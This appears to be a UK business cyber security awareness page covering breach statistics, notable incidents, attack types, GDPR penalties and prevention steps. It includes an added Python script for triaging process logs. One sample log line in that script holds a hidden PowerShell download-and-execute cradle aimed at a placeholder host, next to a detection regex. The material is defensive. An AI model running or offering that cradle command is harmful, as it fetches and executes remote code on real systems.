Why should businesses worry?
40% of businesses in the UK reported a cyber security breach from 2019-2020.
Cyber security breaches cost UK businesses an average of £3,320 from 2019-2020.
Attacks can hinder a business's productivity, harm its reputation and cause it to lose its competitive edge.
Recent cyber attacks
The personal details of 9 million customers were accessed after EasyJet faced a cyber attack in May 2020, with 2,200 customer credit card details stolen by the hackers.
Hotel group Marriott was fined £100m in July 2019 after hackers stole the records of 339 million guests, including credit card details, passport numbers and dates of birth.
Currency service provider Travelex was forced to take its systems offline for almost a month after a ransomware attack hit the firm's website on New Year's Eve 2019, with the attackers demanding the sum of £4.6m.
SMEs can underestimate the threat of cyber attacks and often don't believe they're at risk:
65% of SMEs suffered a cyber attack from 2019-20 compared to 46% of all businesses on average.
24% of senior managers are updated less than once a year on cyber security.
18% of SME decision makers list cyber security as their least concern.
Small and micro businesses lack the resources or knowledge to defend against an attack:
81% do not receive any training on cyber security.
68% have no formal policies for ensuring cyber security.
26% have no cyber security measures at all.
94% of malware is now delivered by email. This is what a common cyber attack now looks like:
An email is sent disguised as an invoice or bill.
The subject lines of emails containing malware often include words such as 'invoice', 'document' or 'order'.
The user is tricked into downloading an attachment.
The file triggers the installation of malicious software.
When the file is launched, it prompts the user to execute a macro or launches PowerShell to download and execute the final payload.
The user's device is typically infected with ransomware, which encrypts the user's private data.
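As an added example that is not part of the original page, the script below triages constructed process-creation log lines for the chain described above: an Office application (the macro host) spawning PowerShell or another shell, and a command line that looks like a hidden launch or a download-and-execute cradle. The log format, field names and sample lines are assumptions made for illustration, not real telemetry.

```python
"""Flag the 'macro -> PowerShell -> download and execute' chain in process-creation logs."""
import re
from dataclasses import dataclass

# Macro-capable Office hosts that should rarely spawn a shell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments typical of a download cradle or a hidden, encoded launch.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|bypass)",
    re.IGNORECASE,
)

@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str

def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'key=value|key=value' process-creation line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcessEvent(fields["parent"].lower(), fields["image"].lower(), fields["cmdline"])

def score_event(ev: ProcessEvent) -> int:
    """0 = benign, 1 = Office host spawned a shell, 2 = ...and it looks like a download cradle."""
    parent = ev.parent.rsplit("\\", 1)[-1]   # strip the directory, keep the image name
    image = ev.image.rsplit("\\", 1)[-1]
    if parent not in OFFICE_PARENTS or image not in SHELLS:
        return 0
    return 2 if DOWNLOAD_CRADLE.search(ev.cmdline) else 1

def triage(lines):
    """Return [(score, event)] for every line scoring above 0, highest score first."""
    hits = [(score_event(ev), ev) for ev in map(parse_event, lines)]
    return sorted([h for h in hits if h[0] > 0], key=lambda h: -h[0])

# Constructed sample log lines (not real telemetry); the URL host is a reserved example name.
SAMPLE_LOG = [
    "parent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')",
    "parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmdline=powershell Get-Process",
    "parent=C:\\Program Files\\Microsoft Office\\EXCEL.EXE|image=C:\\Windows\\System32\\cmd.exe|cmdline=cmd /c echo hello",
]

if __name__ == "__main__":
    for score, ev in triage(SAMPLE_LOG):
        print(score, ev.parent, "->", ev.image, ev.cmdline)
```

A score of 1 is worth a look (a spreadsheet launching cmd.exe is unusual but can be legitimate); a score of 2 matches the exact chain the page describes and should be treated as a likely infection in progress.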
Here are some tactics used to exploit cyber security vulnerabilities:
Phishing
Dupes users into supplying sensitive information by posing as a trustworthy source, such as a bank, a commonly used retailer or a personal acquaintance.
37% of the cyber crimes affecting SMEs were spear phishing attacks.
Malware
Compromises legitimate websites by injecting malicious code that is served to visitors, who are infected when they download the tainted software.
29% of cyber crimes affecting SMEs were malware attacks.
Ransomware
Extorts victims for money or private information in exchange for the decryption of data and removal of the malware.
Ransomware attacks increased 195% during the first half of 2019.
Distributed Denial of Service attack
Attempts to flood a network to disrupt the service and prevent users from accessing it.
16% of SMEs have suffered a DDoS attack.
Cyber attacks are highly lucrative with profits easily made on the black market from selling stolen goods.
Here are estimates of the black market value of some commonly stolen credentials:
Ready-made toolkits for attacks are also available for budding criminals with little technical knowledge required to run attacks on their own:
An attack can damage a business’s financial health directly, and the recovery process can be lengthy and costly. It’s estimated that it costs the small business community £4.5 billion annually.
Attacks resulting in a data breach and exposure of customers’ confidential information negatively impact customers’ views of the business:
Criminals may steal your employees' or customers' personal details; because it is your responsibility to safeguard this data, such a theft can constitute a breach of the Data Protection Act (DPA) and the General Data Protection Regulation (GDPR).
This could result in compensation to individuals who suffered damage from the breach, or in severe penalties from the ICO (Information Commissioner's Office), which can fine you up to 20 million euros (or the equivalent in sterling).
The EU General Data Protection Regulation (GDPR) came into effect in May 2018 and still applies to the UK.
Businesses must be able to prove that any data they hold is protected or face the risk of hefty fines.
As many as 9,000 Tesco Bank customers lost money from their accounts, following a data breach in November 2016.
£2.5 million was stolen from customer accounts in total.
Customers had up to £600 withdrawn from their accounts.
Tesco would have faced fines of over £1.9 billion had the breach occurred under the EU's GDPR.
Educating employees on how to protect sensitive data using security best-practices is crucial to safeguarding your business.
It’s recommended that you consult a network security specialist for a thorough assessment of how to protect your company. Here are some steps you can take right now:
Encourage employees to use strong passwords, refrain from using the same password for multiple logins and change passwords every 90 days.
Always install the latest security updates for software and web applications, which will close known vulnerabilities.
Encrypt sensitive data such as employee details and financial accounts.
Update your anti-virus software and firewall as soon as a new version is released to ensure they’re effective against new forms of malware.
Create "whitelists" that control all traffic through the network by granting access only to approved IP addresses and e-mail addresses.
- Cyber Essentials is a scheme backed and supported by the UK Government to help protect businesses of all sizes against common cyber threats.
- Businesses can attain a Cyber Essentials badge to advertise the fact that they are following government endorsed standards for cyber security. To obtain the badge, businesses can carry out a self-assessment to see if they meet the requirements, or they can be independently assessed by accrediting bodies.
- The scheme outlines five main procedures that should be implemented for basic protection against cyber attacks:
Unfortunately, cyber attacks may succeed despite preventative measures.
Having a plan in place in the event of a successful attack can limit damage. Safeguarding data should be a priority, especially if that data is crucial to the running of your business:
4 in 10 SMEs say they would struggle to recover from data loss.
1 in 4 SMEs admit they wouldn't be able to recover any data.
Logging and monitoring any suspicious activity can inform you as soon as a breach happens, giving you a chance to respond quickly and limit potential damage. This can be done in-house or outsourced to specialists.
Regularly backing up your data means it can be accessed easily to reduce downtime in the event of a breach. However, there is a risk that you may restore the same vulnerabilities which caused the breach in the first place so you should consult a specialist beforehand on how to mitigate this.
Consulting a security specialist for a thorough risk assessment and further advice is essential. You can also:
Have procedures in place which identify and isolate infected systems to prevent further infection.
Establish an incident response team trained with the skills and expertise to address threats.
If your customer database has been compromised, those customers should be directly informed of the breach and advice should be given on what actions they should take, such as changing passwords and checking bank statements.
PowerShell
A framework by Microsoft for automating batch processes and performing configuration management and administrative tasks.
Ransomware
A type of malicious program that prevents victims from accessing their information and private files by encrypting them and demanding a sum of money to return the original unencrypted files.
Android banking trojan
A type of malicious program that disguises itself as a legitimate application, affecting the Android operating system on mobile devices. The Android banking trojan is primarily used to steal and gain access to private information and finances.
Whitelisting
Allows only administrator-approved programs and users to gain system access, blocking anything that has not been approved.
SME (small and medium-sized enterprise)
A company with under 250 employees and an annual turnover under £50 million.
Micro business
A company with 10 or fewer employees and a turnover of less than €2 million. Also known as a micro entity.